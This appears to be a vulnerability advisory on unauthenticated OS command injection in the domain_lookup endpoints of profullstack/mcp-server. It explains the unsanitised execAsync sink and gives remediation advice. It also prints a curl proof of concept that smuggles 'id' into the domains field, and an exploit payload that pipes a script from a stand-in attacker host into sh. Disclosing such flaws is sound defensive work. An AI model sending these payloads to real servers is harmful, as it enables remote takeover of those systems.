Listen to this Post
The vulnerability resides in the `domain_lookup` module, which exposes two unauthenticated HTTP POST endpoints: `/domain-lookup/check` and /domain-lookup/bulk. The module’s `buildTldxCommand()` function (in service.js) concatenates user-supplied `domains` or `keywords` directly into a shell command string using JavaScript template literals. For example, tldx ${keywords.join(' ')}. No sanitization, quoting, or allowlist is applied. This string is then passed to `execAsync()` from Node.js child_process, which spawns a `/bin/sh` shell. An attacker can inject shell metacharacters such as ;, |, $(), or backticks within a JSON payload. Because the server binds to `0.0.0.0` and lacks any global authentication middleware, the attack is remote and unauthenticated. When the injected command executes, the shell interprets the metacharacters before the intended `tldx` binary runs. Even if `tldx` is missing (returning HTTP 500), the injected commands still execute, as proven by writing files to /tmp/verify-exports/. The two endpoints both reach the same vulnerable sink at lines 114–115 and 142 in service.js. The CVSS score is 9.8 (Critical) because the attack vector is network, complexity low, no privileges required, no user interaction, and impact on confidentiality, integrity, and availability is high.
dailycve form:
Platform: profullstack/mcp-server
Version: commit 2e8ea913
Vulnerability: OS command injection
Severity: Critical (9.8)
date: 2026-04-28
Prediction: expected patch 2026-05-05
What Undercode Say:
Analytics:
Count vulnerable execAsync calls
grep -rn "execAsync" mcp_modules/domain_lookup/src/
Check bind address
grep -rn "0.0.0.0" index.js
Simulate injection (safe PoC)
curl -X POST http://target:13000/domain-lookup/check \
-H 'Content-Type: application/json' \
-d '{"domains":["test; id > /tmp/poc.txt; "]}'
how Exploit:
Send POST with JSON containing `; {"domains":["example.com; curl http://attacker/shell.sh | sh; "]}. No authentication needed. The server executes the command as its own UID.
Protection from this CVE
Replace `execAsync(command)` with `execFile(‘tldx’, keywords)` or `spawn()` using argument arrays. Bind server to `127.0.0.1` by default and require authentication middleware. Validate input against RFC 1035 hostname regex, rejecting any shell metacharacters.
Impact:
Unauthenticated remote code execution (RCE). Full read/write/delete access to server files. Lateral movement, credential theft, and persistence. Entire server process compromised.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
